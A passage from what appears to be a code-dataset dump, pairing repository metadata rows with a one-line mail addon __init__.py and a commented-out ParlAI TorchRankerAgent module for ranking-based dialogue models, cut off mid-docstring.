| 20.5 | 40 | 0.829268 | 6 | 41 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 41 | 1 | 41 | 41 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
169f0889ffbfe00c62e34f90a9999cbcc186d301 | 27 | py | Python | mail_fix_553/__init__.py | aaltinisik/mail-addons | d829c1d9e4320013ab557c34d6d79b956ebd7349 | [
"MIT"
] | 1 | 2020-12-07T19:52:33.000Z | 2020-12-07T19:52:33.000Z | mail_fix_553/__init__.py | trojikman/mail-addons | 193caa9af759700a588cdec8910ccbad05b59104 | [
"MIT"
] | 1 | 2019-03-15T14:45:46.000Z | 2019-03-15T14:45:46.000Z | mail_fix_553/__init__.py | trojikman/mail-addons | 193caa9af759700a588cdec8910ccbad05b59104 | [
"MIT"
] | 1 | 2021-08-28T11:18:33.000Z | 2021-08-28T11:18:33.000Z | from . import mail_fix_553
| 13.5 | 26 | 0.814815 | 5 | 27 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.130435 | 0.148148 | 27 | 1 | 27 | 27 | 0.73913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bcc17afeb54e1fbacd7538e1b12f01ca71028e6a | 83,822 | py | Python | parlai/core/torch_ranker_agent.py | SeolhwaLee/Parlai_ver2 | 6f43d1929cab26e07a2f384bc5f731714ddb54d7 | [
"MIT"
] | 1 | 2020-08-25T03:46:02.000Z | 2020-08-25T03:46:02.000Z | parlai/core/torch_ranker_agent.py | sseol11/Parlai_ver2 | 6f43d1929cab26e07a2f384bc5f731714ddb54d7 | [
"MIT"
] | null | null | null | parlai/core/torch_ranker_agent.py | sseol11/Parlai_ver2 | 6f43d1929cab26e07a2f384bc5f731714ddb54d7 | [
"MIT"
] | null | null | null | # #!/usr/bin/env python3
#
# # Copyright (c) Facebook, Inc. and its affiliates.
# # This source code is licensed under the MIT license found in the
# # LICENSE file in the root directory of this source tree.
#
# """
# Torch Ranker Agents provide functionality for building ranking models.
#
# See the TorchRankerAgent tutorial for examples.
# """
#
# from typing import Dict, Any
# from abc import abstractmethod
# from itertools import islice
# import os
# from tqdm import tqdm
# import random
#
# import torch
#
#
# from parlai.core.opt import Opt
# from parlai.utils.distributed import is_distributed
# from parlai.core.torch_agent import TorchAgent, Output
# from parlai.utils.misc import warn_once
# from parlai.utils.torch import padded_3d
# from parlai.core.metrics import AverageMetric
#
#
# class TorchRankerAgent(TorchAgent):
# """
# Abstract TorchRankerAgent class; only meant to be extended.
#
# TorchRankerAgents aim to provide convenient functionality for building ranking
# models. This includes:
#
# - Training/evaluating on candidates from a variety of sources.
# - Computing hits@1, hits@5, mean reciprical rank (MRR), and other metrics.
# - Caching representations for fast runtime when deploying models to production.
# """
#
# @classmethod
# def add_cmdline_args(cls, argparser):
# """
# Add CLI args.
# """
# super(TorchRankerAgent, cls).add_cmdline_args(argparser)
# agent = argparser.add_argument_group('TorchRankerAgent')
# agent.add_argument(
# '-cands',
# '--candidates',
# type=str,
# default='inline',
# choices=['batch', 'inline', 'fixed', 'batch-all-cands'],
# help='The source of candidates during training '
# '(see TorchRankerAgent._build_candidates() for details).',
# )
# agent.add_argument(
# '-ecands',
# '--eval-candidates',
# type=str,
# default='inline',
# choices=['batch', 'inline', 'fixed', 'vocab', 'batch-all-cands'],
# help='The source of candidates during evaluation (defaults to the same'
# 'value as --candidates if no flag is given)',
# )
# agent.add_argument(
# '--repeat-blocking-heuristic',
# type='bool',
# default=True,
# help='Block repeating previous utterances. '
# 'Helpful for many models that score repeats highly, so switched '
# 'on by default.',
# )
# agent.add_argument(
# '-fcp',
# '--fixed-candidates-path',
# type=str,
# help='A text file of fixed candidates to use for all examples, one '
# 'candidate per line',
# )
# agent.add_argument(
# '--fixed-candidate-vecs',
# type=str,
# default='reuse',
# help='One of "reuse", "replace", or a path to a file with vectors '
# 'corresponding to the candidates at --fixed-candidates-path. '
# 'The default path is a /path/to/model-file.<cands_name>, where '
# '<cands_name> is the name of the file (not the full path) passed by '
# 'the flag --fixed-candidates-path. By default, this file is created '
# 'once and reused. To replace it, use the "replace" option.',
# )
# agent.add_argument(
# '--encode-candidate-vecs',
# type='bool',
# default=True,
# help='Cache and save the encoding of the candidate vecs. This '
# 'might be used when interacting with the model in real time '
# 'or evaluating on fixed candidate set when the encoding of '
# 'the candidates is independent of the input.',
# )
# agent.add_argument(
# '--encode-candidate-vecs-batchsize',
# type=int,
# default=256,
# hidden=True,
# help='Batchsize when encoding candidate vecs',
# )
# agent.add_argument(
# '--init-model',
# type=str,
# default=None,
# help='Initialize model with weights from this file.',
# )
# agent.add_argument(
# '--train-predict',
# type='bool',
# default=False,
# help='Get predictions and calculate mean rank during the train '
# 'step. Turning this on may slow down training.',
# )
# agent.add_argument(
# '--cap-num-predictions',
# type=int,
# default=100,
# help='Limit to the number of predictions in output.text_candidates',
# )
# agent.add_argument(
# '--ignore-bad-candidates',
# type='bool',
# default=False,
# help='Ignore examples for which the label is not present in the '
# 'label candidates. Default behavior results in RuntimeError. ',
# )
# agent.add_argument(
# '--rank-top-k',
# type=int,
# default=-1,
# help='Ranking returns the top k results of k > 0, otherwise sorts every '
# 'single candidate according to the ranking.',
# )
# agent.add_argument(
# '--inference',
# choices={'max', 'topk'},
# default='max',
# help='Final response output algorithm',
# )
# agent.add_argument(
# '--topk',
# type=int,
# default=5,
# help='K used in Top K sampling inference, when selected',
# )
#
# def __init__(self, opt: Opt, shared=None):
# # Must call _get_init_model() first so that paths are updated if necessary
# # (e.g., a .dict file)
# init_model, is_finetune = self._get_init_model(opt, shared)
# opt['rank_candidates'] = True
# super().__init__(opt, shared)
#
# states: Dict[str, Any]
# if shared:
# states = {}
# else:
# # Note: we cannot change the type of metrics ahead of time, so you
# # should correctly initialize to floats or ints here
# self.criterion = self.build_criterion()
# self.model = self.build_model()
# if self.model is None or self.criterion is None:
# raise AttributeError(
# 'build_model() and build_criterion() need to return the model or criterion'
# )
# if self.use_cuda:
# self.model.cuda()
# self.criterion.cuda()
#
# print("Total parameters: {}".format(self._total_parameters()))
# print("Trainable parameters: {}".format(self._trainable_parameters()))
#
# if self.fp16:
# self.model = self.model.half()
# if init_model:
# print('Loading existing model parameters from ' + init_model)
# states = self.load(init_model)
# else:
# states = {}
#
# self.rank_top_k = opt.get('rank_top_k', -1)
#
# # Vectorize and save fixed/vocab candidates once upfront if applicable
# self.set_fixed_candidates(shared)
# self.set_vocab_candidates(shared)
#
# if shared:
# # We don't use get here because hasattr is used on optimizer later.
# if 'optimizer' in shared:
# self.optimizer = shared['optimizer']
# else:
# optim_params = [p for p in self.model.parameters() if p.requires_grad]
# self.init_optim(
# optim_params, states.get('optimizer'), states.get('optimizer_type')
# )
# self.build_lr_scheduler(states, hard_reset=is_finetune)
#
# if shared is None and is_distributed():
# self.model = torch.nn.parallel.DistributedDataParallel(
# self.model, device_ids=[self.opt['gpu']], broadcast_buffers=False
# )
#
# def build_criterion(self):
# """
# Construct and return the loss function.
#
# By default torch.nn.CrossEntropyLoss.
# """
# return torch.nn.CrossEntropyLoss(reduction='none')
#
# def set_interactive_mode(self, mode, shared=False):
# super().set_interactive_mode(mode, shared)
# self.candidates = self.opt['candidates']
# self.encode_candidate_vecs = self.opt['encode_candidate_vecs']
# if mode:
# self.eval_candidates = 'fixed'
# self.ignore_bad_candidates = True
# self.fixed_candidates_path = self.opt['fixed_candidates_path']
# if self.fixed_candidates_path is None or self.fixed_candidates_path == '':
# # Attempt to get a standard candidate set for the given task
# path = self.get_task_candidates_path()
# if path:
# if not shared:
# print("[setting fixed_candidates path to: " + path + " ]")
# self.fixed_candidates_path = path
# else:
# self.eval_candidates = self.opt['eval_candidates']
# self.ignore_bad_candidates = self.opt.get('ignore_bad_candidates', False)
# self.fixed_candidates_path = self.opt['fixed_candidates_path']
#
# def get_task_candidates_path(self):
# path = self.opt['model_file'] + '.cands-' + self.opt['task'] + '.cands'
# if os.path.isfile(path) and self.opt['fixed_candidate_vecs'] == 'reuse':
# return path
# print("[ *** building candidates file as they do not exist: " + path + ' *** ]')
# from parlai.scripts.build_candidates import build_cands
# from copy import deepcopy
#
# opt = deepcopy(self.opt)
# opt['outfile'] = path
# opt['datatype'] = 'train:evalmode'
# opt['interactive_task'] = False
# opt['batchsize'] = 1
# build_cands(opt)
# return path
#
# @abstractmethod
# def score_candidates(self, batch, cand_vecs, cand_encs=None):
# """
# Given a batch and candidate set, return scores (for ranking).
#
# :param Batch batch:
# a Batch object (defined in torch_agent.py)
# :param LongTensor cand_vecs:
# padded and tokenized candidates
# :param FloatTensor cand_encs:
# encoded candidates, if these are passed into the function (in cases
# where we cache the candidate encodings), you do not need to call
# self.model on cand_vecs
# """
# pass
#
# def _maybe_invalidate_fixed_encs_cache(self):
# if self.candidates != 'fixed':
# self.fixed_candidate_encs = None
#
# def _get_batch_train_metrics(self, scores):
# """
# Get fast metrics calculations if we train with batch candidates.
#
# Specifically, calculate accuracy ('train_accuracy'), average rank, and mean
# reciprocal rank.
# """
# batchsize = scores.size(0)
# # get accuracy
# targets = scores.new_empty(batchsize).long()
# targets = torch.arange(batchsize, out=targets)
# nb_ok = (scores.max(dim=1)[1] == targets).float()
# self.record_local_metric('train_accuracy', AverageMetric.many(nb_ok))
# # calculate mean_rank
# above_dot_prods = scores - scores.diag().view(-1, 1)
# ranks = (above_dot_prods > 0).float().sum(dim=1) + 1
# mrr = 1.0 / (ranks + 0.00001)
# self.record_local_metric('rank', AverageMetric.many(ranks))
# self.record_local_metric('mrr', AverageMetric.many(mrr))
#
# def _get_train_preds(self, scores, label_inds, cands, cand_vecs):
# """
# Return predictions from training.
# """
# # TODO: speed these calculations up
# batchsize = scores.size(0)
# if self.rank_top_k > 0:
# _, ranks = scores.topk(
# min(self.rank_top_k, scores.size(1)), 1, largest=True
# )
# else:
# _, ranks = scores.sort(1, descending=True)
# ranks_m = []
# mrrs_m = []
# for b in range(batchsize):
# rank = (ranks[b] == label_inds[b]).nonzero()
# rank = rank.item() if len(rank) == 1 else scores.size(1)
# ranks_m.append(1 + rank)
# mrrs_m.append(1.0 / (1 + rank))
# self.record_local_metric('rank', AverageMetric.many(ranks_m))
# self.record_local_metric('mrr', AverageMetric.many(mrrs_m))
#
# ranks = ranks.cpu()
# # Here we get the top prediction for each example, but do not
# # return the full ranked list for the sake of training speed
# preds = []
# for i, ordering in enumerate(ranks):
# if cand_vecs.dim() == 2: # num cands x max cand length
# cand_list = cands
# elif cand_vecs.dim() == 3: # batchsize x num cands x max cand length
# cand_list = cands[i]
# if len(ordering) != len(cand_list):
# # We may have added padded cands to fill out the batch;
# # Here we break after finding the first non-pad cand in the
# # ranked list
# for x in ordering:
# if x < len(cand_list):
# preds.append(cand_list[x])
# break
# else:
# preds.append(cand_list[ordering[0]])
#
# return Output(preds)
#
# def is_valid(self, obs):
# """
# Override from TorchAgent.
#
# Check to see if label candidates contain the label.
# """
# if not self.ignore_bad_candidates:
# return super().is_valid(obs)
#
# if not super().is_valid(obs):
# return False
#
# # skip examples for which the set of label candidates do not
# # contain the label
# if 'labels_vec' in obs and 'label_candidates_vecs' in obs:
# cand_vecs = obs['label_candidates_vecs']
# label_vec = obs['labels_vec']
# matches = [x for x in cand_vecs if torch.equal(x, label_vec)]
# if len(matches) == 0:
# warn_once(
# 'At least one example has a set of label candidates that '
# 'does not contain the label.'
# )
# return False
#
# return True
#
# def train_step(self, batch):
# """
# Train on a single batch of examples.
# """
# self._maybe_invalidate_fixed_encs_cache()
# if batch.text_vec is None and batch.image is None:
# return
# self.model.train()
# self.zero_grad()
#
# cands, cand_vecs, label_inds = self._build_candidates(
# batch, source=self.candidates, mode='train'
# )
# try:
# scores = self.score_candidates(batch, cand_vecs)
# loss = self.criterion(scores, label_inds)
# self.record_local_metric('mean_loss', AverageMetric.many(loss))
# loss = loss.mean()
# self.backward(loss)
# self.update_params()
# except RuntimeError as e:
# # catch out of memory exceptions during fwd/bck (skip batch)
# if 'out of memory' in str(e):
# print(
# '| WARNING: ran out of memory, skipping batch. '
# 'if this happens frequently, decrease batchsize or '
# 'truncate the inputs to the model.'
# )
# return Output()
# else:
# raise e
#
# # Get train predictions
# if self.candidates == 'batch':
# self._get_batch_train_metrics(scores)
# return Output()
# if not self.opt.get('train_predict', False):
# warn_once(
# "Some training metrics are omitted for speed. Set the flag "
# "`--train-predict` to calculate train metrics."
# )
# return Output()
# return self._get_train_preds(scores, label_inds, cands, cand_vecs)
#
# def eval_step(self, batch):
# """
# Evaluate a single batch of examples.
# """
# if batch.text_vec is None and batch.image is None:
# return
# batchsize = (
# batch.text_vec.size(0)
# if batch.text_vec is not None
# else batch.image.size(0)
# )
# self.model.eval()
#
# cands, cand_vecs, label_inds = self._build_candidates(
# batch, source=self.eval_candidates, mode='eval'
# )
#
# cand_encs = None
# if self.encode_candidate_vecs and self.eval_candidates in ['fixed', 'vocab']:
# # if we cached candidate encodings for a fixed list of candidates,
# # pass those into the score_candidates function
# if self.fixed_candidate_encs is None:
# self.fixed_candidate_encs = self._make_candidate_encs(
# cand_vecs
# ).detach()
# if self.eval_candidates == 'fixed':
# cand_encs = self.fixed_candidate_encs
# elif self.eval_candidates == 'vocab':
# cand_encs = self.vocab_candidate_encs
#
# scores = self.score_candidates(batch, cand_vecs, cand_encs=cand_encs)
# if self.rank_top_k > 0:
# _, ranks = scores.topk(
# min(self.rank_top_k, scores.size(1)), 1, largest=True
# )
# else:
# _, ranks = scores.sort(1, descending=True)
#
# # Update metrics
# if label_inds is not None:
# loss = self.criterion(scores, label_inds)
# self.record_local_metric('loss', AverageMetric.many(loss))
# ranks_m = []
# mrrs_m = []
# for b in range(batchsize):
# rank = (ranks[b] == label_inds[b]).nonzero()
# rank = rank.item() if len(rank) == 1 else scores.size(1)
# ranks_m.append(1 + rank)
# mrrs_m.append(1.0 / (1 + rank))
# self.record_local_metric('rank', AverageMetric.many(ranks_m))
# self.record_local_metric('mrr', AverageMetric.many(mrrs_m))
#
# ranks = ranks.cpu()
# max_preds = self.opt['cap_num_predictions']
# cand_preds = []
# for i, ordering in enumerate(ranks):
# if cand_vecs.dim() == 2:
# cand_list = cands
# elif cand_vecs.dim() == 3:
# cand_list = cands[i]
# # using a generator instead of a list comprehension allows
# # to cap the number of elements.
# cand_preds_generator = (
# cand_list[rank] for rank in ordering if rank < len(cand_list)
# )
# cand_preds.append(list(islice(cand_preds_generator, max_preds)))
#
# if (
# self.opt.get('repeat_blocking_heuristic', True)
# and self.eval_candidates == 'fixed'
# ):
# cand_preds = self.block_repeats(cand_preds)
#
# if self.opt.get('inference', 'max') == 'max':
# preds = [cand_preds[i][0] for i in range(batchsize)]
# else:
# # Top-k inference.
# preds = []
# for i in range(batchsize):
# preds.append(random.choice(cand_preds[i][0 : self.opt['topk']]))
#
# return Output(preds, cand_preds)
#
# def block_repeats(self, cand_preds):
# """
# Heuristic to block a model repeating a line from the history.
# """
# history_strings = []
# for h in self.history.history_raw_strings:
# # Heuristic: Block any given line in the history, splitting by '\n'.
# history_strings.extend(h.split('\n'))
#
# new_preds = []
# for cp in cand_preds:
# np = []
# for c in cp:
# if c not in history_strings:
# np.append(c)
# new_preds.append(np)
# return new_preds
#
# def _set_label_cands_vec(self, *args, **kwargs):
# """
# Set the 'label_candidates_vec' field in the observation.
#
# Useful to override to change vectorization behavior.
# """
# obs = args[0]
# if 'labels' in obs:
# cands_key = 'candidates'
# else:
# cands_key = 'eval_candidates'
# if self.opt[cands_key] not in ['inline', 'batch-all-cands']:
# # vectorize label candidates if and only if we are using inline
# # candidates
# return obs
# return super()._set_label_cands_vec(*args, **kwargs)
#
# def _build_candidates(self, batch, source, mode):
# """
# Build a candidate set for this batch.
#
# :param batch:
# a Batch object (defined in torch_agent.py)
# :param source:
# the source from which candidates should be built, one of
# ['batch', 'batch-all-cands', 'inline', 'fixed']
# :param mode:
# 'train' or 'eval'
#
# :return: tuple of tensors (label_inds, cands, cand_vecs)
#
# label_inds: A [bsz] LongTensor of the indices of the labels for each
# example from its respective candidate set
# cands: A [num_cands] list of (text) candidates
# OR a [batchsize] list of such lists if source=='inline'
# cand_vecs: A padded [num_cands, seqlen] LongTensor of vectorized candidates
# OR a [batchsize, num_cands, seqlen] LongTensor if source=='inline'
#
# Possible sources of candidates:
#
# * batch: the set of all labels in this batch
# Use all labels in the batch as the candidate set (with all but the
# example's label being treated as negatives).
# Note: with this setting, the candidate set is identical for all
# examples in a batch. This option may be undesirable if it is possible
# for duplicate labels to occur in a batch, since the second instance of
# the correct label will be treated as a negative.
# * batch-all-cands: the set of all candidates in this batch
# Use all candidates in the batch as candidate set.
# Note 1: This can result in a very large number of candidates.
# Note 2: In this case we will deduplicate candidates.
# Note 3: just like with 'batch' the candidate set is identical
# for all examples in a batch.
# * inline: batch_size lists, one list per example
# If each example comes with a list of possible candidates, use those.
# Note: With this setting, each example will have its own candidate set.
# * fixed: one global candidate list, provided in a file from the user
# If self.fixed_candidates is not None, use a set of fixed candidates for
# all examples.
# Note: this setting is not recommended for training unless the
# universe of possible candidates is very small.
# * vocab: one global candidate list, extracted from the vocabulary with the
# exception of self.NULL_IDX.
# """
# label_vecs = batch.label_vec # [bsz] list of lists of LongTensors
# label_inds = None
# batchsize = (
# batch.text_vec.size(0)
# if batch.text_vec is not None
# else batch.image.size(0)
# )
#
# if label_vecs is not None:
# assert label_vecs.dim() == 2
#
# if source == 'batch':
# warn_once(
# '[ Executing {} mode with batch labels as set of candidates. ]'
# ''.format(mode)
# )
# if batchsize == 1:
# warn_once(
# "[ Warning: using candidate source 'batch' and observed a "
# "batch of size 1. This may be due to uneven batch sizes at "
# "the end of an epoch. ]"
# )
# if label_vecs is None:
# raise ValueError(
# "If using candidate source 'batch', then batch.label_vec cannot be "
# "None."
# )
#
# cands = batch.labels
# cand_vecs = label_vecs
# label_inds = label_vecs.new_tensor(range(batchsize))
#
# elif source == 'batch-all-cands':
# warn_once(
# '[ Executing {} mode with all candidates provided in the batch ]'
# ''.format(mode)
# )
# if batch.candidate_vecs is None:
# raise ValueError(
# "If using candidate source 'batch-all-cands', then batch."
# "candidate_vecs cannot be None. If your task does not have "
# "inline candidates, consider using one of "
# "--{m}={{'batch','fixed','vocab'}}."
# "".format(m='candidates' if mode == 'train' else 'eval-candidates')
# )
# # initialize the list of cands with the labels
# cands = []
# all_cands_vecs = []
# # dictionary used for deduplication
# cands_to_id = {}
# for i, cands_for_sample in enumerate(batch.candidates):
# for j, cand in enumerate(cands_for_sample):
# if cand not in cands_to_id:
# cands.append(cand)
# cands_to_id[cand] = len(cands_to_id)
# all_cands_vecs.append(batch.candidate_vecs[i][j])
# cand_vecs, _ = self._pad_tensor(all_cands_vecs)
# label_inds = label_vecs.new_tensor(
# [cands_to_id[label] for label in batch.labels]
# )
#
# elif source == 'inline':
# warn_once(
# '[ Executing {} mode with provided inline set of candidates ]'
# ''.format(mode)
# )
# if batch.candidate_vecs is None:
# raise ValueError(
# "If using candidate source 'inline', then batch.candidate_vecs "
# "cannot be None. If your task does not have inline candidates, "
# "consider using one of --{m}={{'batch','fixed','vocab'}}."
# "".format(m='candidates' if mode == 'train' else 'eval-candidates')
# )
#
# cands = batch.candidates
# cand_vecs = padded_3d(
# batch.candidate_vecs,
# self.NULL_IDX,
# use_cuda=self.use_cuda,
# fp16friendly=self.fp16,
# )
# if label_vecs is not None:
# label_inds = label_vecs.new_empty((batchsize))
# bad_batch = False
# for i, label_vec in enumerate(label_vecs):
# label_vec_pad = label_vec.new_zeros(cand_vecs[i].size(1)).fill_(
# self.NULL_IDX
# )
# if cand_vecs[i].size(1) < len(label_vec):
# label_vec = label_vec[0 : cand_vecs[i].size(1)]
# label_vec_pad[0 : label_vec.size(0)] = label_vec
# label_inds[i] = self._find_match(cand_vecs[i], label_vec_pad)
# if label_inds[i] == -1:
# bad_batch = True
# if bad_batch:
# if self.ignore_bad_candidates and not self.is_training:
# label_inds = None
# else:
# raise RuntimeError(
# 'At least one of your examples has a set of label candidates '
# 'that does not contain the label. To ignore this error '
# 'set `--ignore-bad-candidates True`.'
# )
#
# elif source == 'fixed':
# if self.fixed_candidates is None:
# raise ValueError(
# "If using candidate source 'fixed', then you must provide the path "
# "to a file of candidates with the flag --fixed-candidates-path or "
# "the name of a task with --fixed-candidates-task."
# )
# warn_once(
# "[ Executing {} mode with a common set of fixed candidates "
# "(n = {}). ]".format(mode, len(self.fixed_candidates))
# )
#
# cands = self.fixed_candidates
# cand_vecs = self.fixed_candidate_vecs
#
# if label_vecs is not None:
# label_inds = label_vecs.new_empty((batchsize))
# bad_batch = False
# for batch_idx, label_vec in enumerate(label_vecs):
# max_c_len = cand_vecs.size(1)
# label_vec_pad = label_vec.new_zeros(max_c_len).fill_(self.NULL_IDX)
# if max_c_len < len(label_vec):
# label_vec = label_vec[0:max_c_len]
# label_vec_pad[0 : label_vec.size(0)] = label_vec
# label_inds[batch_idx] = self._find_match(cand_vecs, label_vec_pad)
# if label_inds[batch_idx] == -1:
# bad_batch = True
# if bad_batch:
# if self.ignore_bad_candidates and not self.is_training:
# label_inds = None
# else:
# raise RuntimeError(
# 'At least one of your examples has a set of label candidates '
# 'that does not contain the label. To ignore this error '
# 'set `--ignore-bad-candidates True`.'
# )
#
# elif source == 'vocab':
# warn_once(
# '[ Executing {} mode with tokens from vocabulary as candidates. ]'
# ''.format(mode)
# )
# cands = self.vocab_candidates
# cand_vecs = self.vocab_candidate_vecs
# # NOTE: label_inds is None here, as we will not find the label in
# # the set of vocab candidates
# else:
# raise Exception("Unrecognized source: %s" % source)
#
# return (cands, cand_vecs, label_inds)
#
# @staticmethod
# def _find_match(cand_vecs, label_vec):
# matches = ((cand_vecs == label_vec).sum(1) == cand_vecs.size(1)).nonzero()
# if len(matches) > 0:
# return matches[0]
# return -1
#
# def share(self):
# """
# Share model parameters.
# """
# shared = super().share()
# shared['fixed_candidates'] = self.fixed_candidates
# shared['fixed_candidate_vecs'] = self.fixed_candidate_vecs
# shared['fixed_candidate_encs'] = self.fixed_candidate_encs
# shared['num_fixed_candidates'] = self.num_fixed_candidates
# shared['vocab_candidates'] = self.vocab_candidates
# shared['vocab_candidate_vecs'] = self.vocab_candidate_vecs
# shared['vocab_candidate_encs'] = self.vocab_candidate_encs
# shared['optimizer'] = self.optimizer
# return shared
#
# def set_vocab_candidates(self, shared):
# """
# Load the tokens from the vocab as candidates.
#
# self.vocab_candidates will contain a [num_cands] list of strings
# self.vocab_candidate_vecs will contain a [num_cands, 1] LongTensor
# """
# if shared:
# self.vocab_candidates = shared['vocab_candidates']
# self.vocab_candidate_vecs = shared['vocab_candidate_vecs']
# self.vocab_candidate_encs = shared['vocab_candidate_encs']
# else:
# if 'vocab' in (self.opt['candidates'], self.opt['eval_candidates']):
# cands = []
# vecs = []
# for ind in range(1, len(self.dict)):
# cands.append(self.dict.ind2tok[ind])
# vecs.append(ind)
# self.vocab_candidates = cands
# self.vocab_candidate_vecs = torch.LongTensor(vecs).unsqueeze(1)
# print(
# "[ Loaded fixed candidate set (n = {}) from vocabulary ]"
# "".format(len(self.vocab_candidates))
# )
# if self.use_cuda:
# self.vocab_candidate_vecs = self.vocab_candidate_vecs.cuda()
#
# if self.encode_candidate_vecs:
# # encode vocab candidate vecs
# self.vocab_candidate_encs = self._make_candidate_encs(
# self.vocab_candidate_vecs
# )
# if self.use_cuda:
# self.vocab_candidate_encs = self.vocab_candidate_encs.cuda()
# if self.fp16:
# self.vocab_candidate_encs = self.vocab_candidate_encs.half()
# else:
# self.vocab_candidate_encs = self.vocab_candidate_encs.float()
# else:
# self.vocab_candidate_encs = None
# else:
# self.vocab_candidates = None
# self.vocab_candidate_vecs = None
# self.vocab_candidate_encs = None
#
# def set_fixed_candidates(self, shared):
# """
# Load a set of fixed candidates and their vectors (or vectorize them here).
#
# self.fixed_candidates will contain a [num_cands] list of strings
# self.fixed_candidate_vecs will contain a [num_cands, seq_len] LongTensor
#
# See the note on the --fixed-candidate-vecs flag for an explanation of the
# 'reuse', 'replace', or path options.
#
# Note: TorchRankerAgent by default converts candidates to vectors by vectorizing
# in the common sense (i.e., replacing each token with its index in the
# dictionary). If a child model wants to additionally perform encoding, it can
# overwrite the vectorize_fixed_candidates() method to produce encoded vectors
# instead of just vectorized ones.
# """
# if shared:
# self.fixed_candidates = shared['fixed_candidates']
# self.fixed_candidate_vecs = shared['fixed_candidate_vecs']
# self.fixed_candidate_encs = shared['fixed_candidate_encs']
# self.num_fixed_candidates = shared['num_fixed_candidates']
# else:
# self.num_fixed_candidates = 0
# opt = self.opt
# cand_path = self.fixed_candidates_path
# if 'fixed' in (self.candidates, self.eval_candidates):
# if not cand_path:
# # Attempt to get a standard candidate set for the given task
# path = self.get_task_candidates_path()
# if path:
# print("[setting fixed_candidates path to: " + path + " ]")
# self.fixed_candidates_path = path
# cand_path = self.fixed_candidates_path
# # Load candidates
# print("[ Loading fixed candidate set from {} ]".format(cand_path))
# with open(cand_path, 'r', encoding='utf-8') as f:
# cands = [line.strip() for line in f.readlines()]
# # Load or create candidate vectors
# if os.path.isfile(self.opt['fixed_candidate_vecs']):
# vecs_path = opt['fixed_candidate_vecs']
# vecs = self.load_candidates(vecs_path)
# else:
# setting = self.opt['fixed_candidate_vecs']
# model_dir, model_file = os.path.split(self.opt['model_file'])
# model_name = os.path.splitext(model_file)[0]
# cands_name = os.path.splitext(os.path.basename(cand_path))[0]
# vecs_path = os.path.join(
# model_dir, '.'.join([model_name, cands_name, 'vecs'])
# )
# if setting == 'reuse' and os.path.isfile(vecs_path):
# vecs = self.load_candidates(vecs_path)
# else: # setting == 'replace' OR generating for the first time
# vecs = self._make_candidate_vecs(cands)
# self._save_candidates(vecs, vecs_path)
#
# self.fixed_candidates = cands
# self.num_fixed_candidates = len(self.fixed_candidates)
# self.fixed_candidate_vecs = vecs
# if self.use_cuda:
# self.fixed_candidate_vecs = self.fixed_candidate_vecs.cuda()
#
# if self.encode_candidate_vecs:
# # candidate encodings are fixed so set them up now
# enc_path = os.path.join(
# model_dir, '.'.join([model_name, cands_name, 'encs'])
# )
# if setting == 'reuse' and os.path.isfile(enc_path):
# encs = self.load_candidates(enc_path, cand_type='encodings')
# else:
# encs = self._make_candidate_encs(self.fixed_candidate_vecs)
# self._save_candidates(
# encs, path=enc_path, cand_type='encodings'
# )
# self.fixed_candidate_encs = encs
# if self.use_cuda:
# self.fixed_candidate_encs = self.fixed_candidate_encs.cuda()
# if self.fp16:
# self.fixed_candidate_encs = self.fixed_candidate_encs.half()
# else:
# self.fixed_candidate_encs = self.fixed_candidate_encs.float()
# else:
# self.fixed_candidate_encs = None
#
# else:
# self.fixed_candidates = None
# self.fixed_candidate_vecs = None
# self.fixed_candidate_encs = None
#
# def load_candidates(self, path, cand_type='vectors'):
# """
# Load fixed candidates from a path.
# """
# print("[ Loading fixed candidate set {} from {} ]".format(cand_type, path))
# return torch.load(path, map_location=lambda cpu, _: cpu)
#
# def _make_candidate_vecs(self, cands):
# """
# Prebuild cached vectors for fixed candidates.
# """
# cand_batches = [cands[i : i + 512] for i in range(0, len(cands), 512)]
# print(
# "[ Vectorizing fixed candidate set ({} batch(es) of up to 512) ]"
# "".format(len(cand_batches))
# )
# cand_vecs = []
# for batch in tqdm(cand_batches):
# cand_vecs.extend(self.vectorize_fixed_candidates(batch))
# return padded_3d(
# [cand_vecs], pad_idx=self.NULL_IDX, dtype=cand_vecs[0].dtype
# ).squeeze(0)
#
# def _save_candidates(self, vecs, path, cand_type='vectors'):
# """
# Save cached vectors.
# """
# print("[ Saving fixed candidate set {} to {} ]".format(cand_type, path))
# with open(path, 'wb') as f:
# torch.save(vecs, f)
#
# def encode_candidates(self, padded_cands):
# """
# Convert the given candidates to vectors.
#
# This is an abstract method that must be implemented by the user.
#
# :param padded_cands:
# The padded candidates.
# """
# raise NotImplementedError(
# 'Abstract method: user must implement encode_candidates(). '
# 'If your agent encodes candidates independently '
# 'from context, you can get performance gains with fixed cands by '
# 'implementing this function and running with the flag '
# '--encode-candidate-vecs True.'
# )
#
# def _make_candidate_encs(self, vecs):
# """
# Encode candidates from candidate vectors.
#
# Requires encode_candidates() to be implemented.
# """
#
# cand_encs = []
# bsz = self.opt.get('encode_candidate_vecs_batchsize', 256)
# vec_batches = [vecs[i : i + bsz] for i in range(0, len(vecs), bsz)]
# print(
# "[ Encoding fixed candidates set from ({} batch(es) of up to {}) ]"
# "".format(len(vec_batches), bsz)
# )
# # Put model into eval mode when encoding candidates
# self.model.eval()
# with torch.no_grad():
# for vec_batch in tqdm(vec_batches):
# cand_encs.append(self.encode_candidates(vec_batch).cpu())
# return torch.cat(cand_encs, 0).to(vec_batch.device)
#
# def vectorize_fixed_candidates(self, cands_batch, add_start=False, add_end=False):
# """
